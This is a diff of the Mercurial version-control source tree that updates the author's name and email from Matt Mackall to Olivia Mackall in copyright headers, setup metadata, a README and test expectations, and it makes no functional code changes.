diff --git a/mercurial/httppeer.py b/mercurial/httppeer.py --- a/mercurial/httppeer.py +++ b/mercurial/httppeer.py @@ -1,6 +1,6 @@ # httppeer.py - HTTP repository proxy classes for mercurial # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # # This software may be used and distributed according to the terms of the diff --git a/mercurial/i18n.py b/mercurial/i18n.py --- a/mercurial/i18n.py +++ b/mercurial/i18n.py @@ -1,6 +1,6 @@ # i18n.py - internationalization support for mercurial # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -1,6 +1,6 @@ # localrepo.py - read/write repository class for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/lock.py b/mercurial/lock.py --- a/mercurial/lock.py +++ b/mercurial/lock.py @@ -1,6 +1,6 @@ # lock.py - simple advisory locking scheme for mercurial # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/logcmdutil.py b/mercurial/logcmdutil.py --- a/mercurial/logcmdutil.py +++ b/mercurial/logcmdutil.py @@ -1,6 +1,6 @@ # logcmdutil.py - utility for log-like commands # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/mail.py b/mercurial/mail.py --- a/mercurial/mail.py +++ b/mercurial/mail.py @@ -1,6 +1,6 @@ # mail.py - mail sending bits for mercurial # -# Copyright 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/manifest.py b/mercurial/manifest.py --- a/mercurial/manifest.py +++ b/mercurial/manifest.py @@ -1,6 +1,6 @@ # manifest.py - manifest revision class for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/match.py b/mercurial/match.py --- a/mercurial/match.py +++ b/mercurial/match.py @@ -1,6 +1,6 @@ # match.py - filename matching # -# Copyright 2008, 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2008, 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/mdiff.py b/mercurial/mdiff.py --- a/mercurial/mdiff.py +++ b/mercurial/mdiff.py @@ -1,6 +1,6 @@ # mdiff.py - diff and patch routines for mercurial # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/merge.py b/mercurial/merge.py --- a/mercurial/merge.py +++ b/mercurial/merge.py @@ -1,6 +1,6 @@ # merge.py - directory-level update/merge handling for Mercurial # -# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com> +# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/mergeutil.py b/mercurial/mergeutil.py --- a/mercurial/mergeutil.py +++ b/mercurial/mergeutil.py @@ -1,6 +1,6 @@ # mergeutil.py - help for merge processing in mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/minirst.py b/mercurial/minirst.py --- a/mercurial/minirst.py +++ b/mercurial/minirst.py @@ -1,6 +1,6 @@ # minirst.py - minimal reStructuredText parser # -# Copyright 2009, 2010 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009, 2010 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/mpatch.c b/mercurial/mpatch.c --- a/mercurial/mpatch.c +++ b/mercurial/mpatch.c @@ -14,7 +14,7 @@ allocation of intermediate Python objects. Working memory is about 2x the total number of hunks. 
- Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> + Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> This software may be used and distributed according to the terms of the GNU General Public License, incorporated herein by reference. diff --git a/mercurial/node.py b/mercurial/node.py --- a/mercurial/node.py +++ b/mercurial/node.py @@ -1,6 +1,6 @@ # node.py - basic nodeid manipulation for mercurial # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/parser.py b/mercurial/parser.py --- a/mercurial/parser.py +++ b/mercurial/parser.py @@ -1,6 +1,6 @@ # parser.py - simple top-down operator precedence parser for mercurial # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/posix.py b/mercurial/posix.py --- a/mercurial/posix.py +++ b/mercurial/posix.py @@ -1,6 +1,6 @@ # posix.py - Posix utility function implementations for Mercurial # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/pure/bdiff.py b/mercurial/pure/bdiff.py --- a/mercurial/pure/bdiff.py +++ b/mercurial/pure/bdiff.py @@ -1,6 +1,6 @@ # bdiff.py - Python implementation of bdiff.c # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/pure/charencode.py b/mercurial/pure/charencode.py --- a/mercurial/pure/charencode.py +++ b/mercurial/pure/charencode.py @@ -1,6 +1,6 @@ # charencode.py - miscellaneous character encoding # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/pure/mpatch.py b/mercurial/pure/mpatch.py --- a/mercurial/pure/mpatch.py +++ b/mercurial/pure/mpatch.py @@ -1,6 +1,6 @@ # mpatch.py - Python implementation of mpatch.c # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/pure/osutil.py b/mercurial/pure/osutil.py --- a/mercurial/pure/osutil.py +++ b/mercurial/pure/osutil.py @@ -1,6 +1,6 @@ # osutil.py - pure Python version of osutil.c # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/pure/parsers.py b/mercurial/pure/parsers.py --- a/mercurial/pure/parsers.py +++ b/mercurial/pure/parsers.py @@ -1,6 +1,6 @@ # parsers.py - Python implementation of parsers.c # -# Copyright 2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/pushkey.py b/mercurial/pushkey.py --- a/mercurial/pushkey.py +++ b/mercurial/pushkey.py @@ -1,6 +1,6 @@ # pushkey.py - dispatching for pushing and pulling keys # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/pvec.py b/mercurial/pvec.py --- a/mercurial/pvec.py +++ b/mercurial/pvec.py @@ -1,6 +1,6 @@ # pvec.py - probabilistic vector clocks for Mercurial # -# Copyright 2012 Matt Mackall <mpm@selenic.com> +# Copyright 2012 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/repair.py b/mercurial/repair.py --- a/mercurial/repair.py +++ b/mercurial/repair.py @@ -1,7 +1,7 @@ # repair.py - functions for repository repair for mercurial # # Copyright 2005, 2006 Chris Mason <mason@suse.com> -# Copyright 2007 Matt Mackall +# Copyright 2007 Olivia Mackall # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/requirements.py b/mercurial/requirements.py --- a/mercurial/requirements.py +++ b/mercurial/requirements.py @@ -1,6 +1,6 @@ # requirements.py - objects and functions related to repository requirements # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -1,6 +1,6 @@ # revlog.py - storage back-end for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/revlogutils/constants.py b/mercurial/revlogutils/constants.py --- a/mercurial/revlogutils/constants.py +++ b/mercurial/revlogutils/constants.py @@ -1,6 +1,6 @@ # revlogdeltas.py - constant used for revlog logic # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2018 Octobus <contact@octobus.net> # # This software may be used and distributed according to the terms of the diff --git a/mercurial/revlogutils/deltas.py b/mercurial/revlogutils/deltas.py --- a/mercurial/revlogutils/deltas.py +++ b/mercurial/revlogutils/deltas.py @@ -1,6 +1,6 @@ # revlogdeltas.py - Logic around delta computation for revlog # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2018 Octobus <contact@octobus.net> # # This software may be used and distributed according to the terms of the diff --git a/mercurial/revset.py b/mercurial/revset.py --- a/mercurial/revset.py +++ b/mercurial/revset.py @@ -1,6 +1,6 @@ # revset.py - revision set queries 
for mercurial # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/revsetlang.py b/mercurial/revsetlang.py --- a/mercurial/revsetlang.py +++ b/mercurial/revsetlang.py @@ -1,6 +1,6 @@ # revsetlang.py - parser, tokenizer and utility for revision set language # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/scmutil.py b/mercurial/scmutil.py --- a/mercurial/scmutil.py +++ b/mercurial/scmutil.py @@ -1,6 +1,6 @@ # scmutil.py - Mercurial core utility functions # -# Copyright Matt Mackall <mpm@selenic.com> +# Copyright Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/server.py b/mercurial/server.py --- a/mercurial/server.py +++ b/mercurial/server.py @@ -1,6 +1,6 @@ # server.py - utility and factory of server # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/similar.py b/mercurial/similar.py --- a/mercurial/similar.py +++ b/mercurial/similar.py @@ -1,6 +1,6 @@ # similar.py - mechanisms for finding similar files # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/smartset.py b/mercurial/smartset.py --- a/mercurial/smartset.py +++ b/mercurial/smartset.py @@ -1,6 +1,6 @@ # smartset.py - data structure for revision set # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/sshpeer.py b/mercurial/sshpeer.py --- a/mercurial/sshpeer.py +++ b/mercurial/sshpeer.py @@ -1,6 +1,6 @@ # sshpeer.py - ssh repository proxy class for mercurial # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/sslutil.py b/mercurial/sslutil.py --- a/mercurial/sslutil.py +++ b/mercurial/sslutil.py @@ -1,6 +1,6 @@ # sslutil.py - SSL handling for mercurial # -# Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006, 2007, 2008 Olivia Mackall <olivia@selenic.com> # Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # diff --git a/mercurial/stack.py b/mercurial/stack.py --- a/mercurial/stack.py +++ b/mercurial/stack.py @@ -1,6 +1,6 @@ # stack.py - Mercurial functions for stack definition # -# Copyright Matt Mackall <mpm@selenic.com> and other +# Copyright Olivia Mackall <olivia@selenic.com> and other # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/statichttprepo.py b/mercurial/statichttprepo.py --- a/mercurial/statichttprepo.py +++ b/mercurial/statichttprepo.py @@ -2,7 +2,7 @@ # # This provides read-only repo access to repositories exported via static http # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/store.py b/mercurial/store.py --- a/mercurial/store.py +++ b/mercurial/store.py @@ -1,6 +1,6 @@ # store.py - repository store handling for Mercurial # -# Copyright 2008 Matt Mackall <mpm@selenic.com> +# Copyright 2008 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/subrepo.py b/mercurial/subrepo.py --- a/mercurial/subrepo.py +++ b/mercurial/subrepo.py @@ -1,6 +1,6 @@ # subrepo.py - sub-repository classes and factory # -# Copyright 2009-2010 Matt Mackall <mpm@selenic.com> +# Copyright 2009-2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/subrepoutil.py b/mercurial/subrepoutil.py --- a/mercurial/subrepoutil.py +++ b/mercurial/subrepoutil.py @@ -1,6 +1,6 @@ # subrepoutil.py - sub-repository operations and substate handling # -# Copyright 2009-2010 Matt Mackall <mpm@selenic.com> +# Copyright 2009-2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/tags.py b/mercurial/tags.py --- a/mercurial/tags.py +++ b/mercurial/tags.py @@ -1,6 +1,6 @@ # tags.py - read tag info from local repository # -# Copyright 2009 Matt Mackall <mpm@selenic.com> +# Copyright 2009 Olivia Mackall <olivia@selenic.com> # Copyright 2009 Greg Ward <greg@gerg.ca> # # This software may be used and distributed according to the terms of the diff --git a/mercurial/templatefilters.py b/mercurial/templatefilters.py --- a/mercurial/templatefilters.py +++ b/mercurial/templatefilters.py @@ -1,6 +1,6 @@ # templatefilters.py - common template expansion filters # -# Copyright 2005-2008 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2008 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/templatefuncs.py b/mercurial/templatefuncs.py --- a/mercurial/templatefuncs.py +++ b/mercurial/templatefuncs.py @@ -1,6 +1,6 @@ # templatefuncs.py - common template functions # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/templatekw.py b/mercurial/templatekw.py --- a/mercurial/templatekw.py +++ b/mercurial/templatekw.py @@ -1,6 +1,6 @@ # templatekw.py - common changeset template keywords # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/templater.py b/mercurial/templater.py --- a/mercurial/templater.py +++ b/mercurial/templater.py @@ -1,6 +1,6 @@ # templater.py - template expansion for output # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/templateutil.py b/mercurial/templateutil.py --- a/mercurial/templateutil.py +++ b/mercurial/templateutil.py @@ -1,6 +1,6 @@ # templateutil.py - utility for template evaluation # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/transaction.py b/mercurial/transaction.py --- a/mercurial/transaction.py +++ b/mercurial/transaction.py @@ -6,7 +6,7 @@ # effectively log-structured, this should amount to simply truncating # anything that isn't referenced in the changelog. # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/treediscovery.py b/mercurial/treediscovery.py --- a/mercurial/treediscovery.py +++ b/mercurial/treediscovery.py @@ -1,6 +1,6 @@ # discovery.py - protocol changeset discovery functions # -# Copyright 2010 Matt Mackall <mpm@selenic.com> +# Copyright 2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -1,6 +1,6 @@ # ui.py - user interface bits for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/url.py b/mercurial/url.py --- a/mercurial/url.py +++ b/mercurial/url.py @@ -1,6 +1,6 @@ # url.py - HTTP handling for mercurial # -# Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006, 2007, 2008 Olivia Mackall <olivia@selenic.com> # Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # diff --git a/mercurial/util.py b/mercurial/util.py --- a/mercurial/util.py +++ b/mercurial/util.py @@ -1,7 +1,7 @@ # util.py - Mercurial utility functions and platform specific implementations # # Copyright 2005 K. Thananchayan <thananck@yahoo.com> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # # This software may be used and distributed according to the terms of the diff --git a/mercurial/utils/procutil.py b/mercurial/utils/procutil.py --- a/mercurial/utils/procutil.py +++ b/mercurial/utils/procutil.py @@ -1,7 +1,7 @@ # procutil.py - utility for managing processes and executable environment # # Copyright 2005 K. 
Thananchayan <thananck@yahoo.com> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # # This software may be used and distributed according to the terms of the diff --git a/mercurial/utils/resourceutil.py b/mercurial/utils/resourceutil.py --- a/mercurial/utils/resourceutil.py +++ b/mercurial/utils/resourceutil.py @@ -1,7 +1,7 @@ # resourceutil.py - utility for looking up resources # # Copyright 2005 K. Thananchayan <thananck@yahoo.com> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # # This software may be used and distributed according to the terms of the diff --git a/mercurial/utils/stringutil.py b/mercurial/utils/stringutil.py --- a/mercurial/utils/stringutil.py +++ b/mercurial/utils/stringutil.py @@ -1,7 +1,7 @@ # stringutil.py - utility for generic string formatting, parsing, etc. # # Copyright 2005 K. Thananchayan <thananck@yahoo.com> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # # This software may be used and distributed according to the terms of the diff --git a/mercurial/verify.py b/mercurial/verify.py --- a/mercurial/verify.py +++ b/mercurial/verify.py @@ -1,6 +1,6 @@ # verify.py - repository integrity checking for Mercurial # -# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com> +# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/vfs.py b/mercurial/vfs.py --- a/mercurial/vfs.py +++ b/mercurial/vfs.py @@ -1,6 +1,6 @@ # vfs.py - Mercurial 'vfs' classes # -# Copyright Matt Mackall <mpm@selenic.com> +# Copyright Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/win32.py b/mercurial/win32.py --- a/mercurial/win32.py +++ b/mercurial/win32.py @@ -1,6 +1,6 @@ # win32.py - utility functions that use win32 API # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/windows.py b/mercurial/windows.py --- a/mercurial/windows.py +++ b/mercurial/windows.py @@ -1,6 +1,6 @@ # windows.py - Windows utility function implementations for Mercurial # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/wireprotoserver.py b/mercurial/wireprotoserver.py --- a/mercurial/wireprotoserver.py +++ b/mercurial/wireprotoserver.py @@ -1,5 +1,5 @@ # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/wireprotov1peer.py b/mercurial/wireprotov1peer.py --- a/mercurial/wireprotov1peer.py +++ b/mercurial/wireprotov1peer.py @@ -1,6 +1,6 @@ # wireprotov1peer.py - Client-side functionality for wire protocol version 1. 
# -# Copyright 2005-2010 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/wireprotov1server.py b/mercurial/wireprotov1server.py --- a/mercurial/wireprotov1server.py +++ b/mercurial/wireprotov1server.py @@ -1,6 +1,6 @@ # wireprotov1server.py - Wire protocol version 1 server functionality # -# Copyright 2005-2010 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/wireprotov2server.py b/mercurial/wireprotov2server.py --- a/mercurial/wireprotov2server.py +++ b/mercurial/wireprotov2server.py @@ -1,5 +1,5 @@ # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/worker.py b/mercurial/worker.py --- a/mercurial/worker.py +++ b/mercurial/worker.py @@ -442,7 +442,7 @@ we ever write workers that need to preserve grouping in input we should consider allowing callers to specify a partition strategy. - mpm is not a fan of this partitioning strategy when files are involved. + olivia is not a fan of this partitioning strategy when files are involved. 
In his words: Single-threaded Mercurial makes a point of creating and visiting diff --git a/rust/hgcli/README.md b/rust/hgcli/README.md --- a/rust/hgcli/README.md +++ b/rust/hgcli/README.md @@ -32,7 +32,7 @@ Mercurial Distributed SCM (version 5.3.1+433-f99cd77d53dc+20200331) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-2020 Matt Mackall and others + Copyright (C) 2005-2020 Olivia Mackall and others This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. diff --git a/setup.py b/setup.py --- a/setup.py +++ b/setup.py @@ -1700,7 +1700,7 @@ extra['console'] = [ { 'script': 'hg', - 'copyright': 'Copyright (C) 2005-2021 Matt Mackall and others', + 'copyright': 'Copyright (C) 2005-2021 Olivia Mackall and others', 'product_version': version, } ] @@ -1776,7 +1776,7 @@ setup( name='mercurial', version=setupversion, - author='Matt Mackall and many others', + author='Olivia Mackall and many others', author_email='mercurial@mercurial-scm.org', url='https://mercurial-scm.org/', download_url='https://mercurial-scm.org/release/', diff --git a/tests/logexceptions.py b/tests/logexceptions.py --- a/tests/logexceptions.py +++ b/tests/logexceptions.py @@ -1,6 +1,6 @@ # logexceptions.py - Write files containing info about Mercurial exceptions # -# Copyright 2017 Matt Mackall <mpm@selenic.com> +# Copyright 2017 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/tests/run-tests.py b/tests/run-tests.py --- a/tests/run-tests.py +++ b/tests/run-tests.py @@ -2,7 +2,7 @@ # # run-tests.py - Run a set of tests on Mercurial # -# Copyright 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/tests/test-extension.t b/tests/test-extension.t --- a/tests/test-extension.t +++ b/tests/test-extension.t @@ -676,7 +676,7 @@ Mercurial Distributed SCM (version *) (glob) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. @@ -1555,7 +1555,7 @@ Mercurial Distributed SCM (version *) (glob) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. @@ -1566,7 +1566,7 @@ Mercurial Distributed SCM (version *) (glob) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. @@ -1580,7 +1580,7 @@ Mercurial Distributed SCM (version *) (glob) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. 
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. @@ -1642,7 +1642,7 @@ Mercurial Distributed SCM (version 3.5.2) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. diff --git a/tests/test-help.t b/tests/test-help.t --- a/tests/test-help.t +++ b/tests/test-help.t @@ -575,7 +575,7 @@ Mercurial Distributed SCM (version *) (glob) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. diff --git a/tests/test-hgrc.t b/tests/test-hgrc.t --- a/tests/test-hgrc.t +++ b/tests/test-hgrc.t @@ -84,7 +84,7 @@ Mercurial Distributed SCM (version *) (glob) (see https://mercurial-scm.org for more information) - Copyright (C) 2005-* Matt Mackall and others (glob) + Copyright (C) 2005-* Olivia Mackall and others (glob) This is free software; see the source for copying conditions. There is 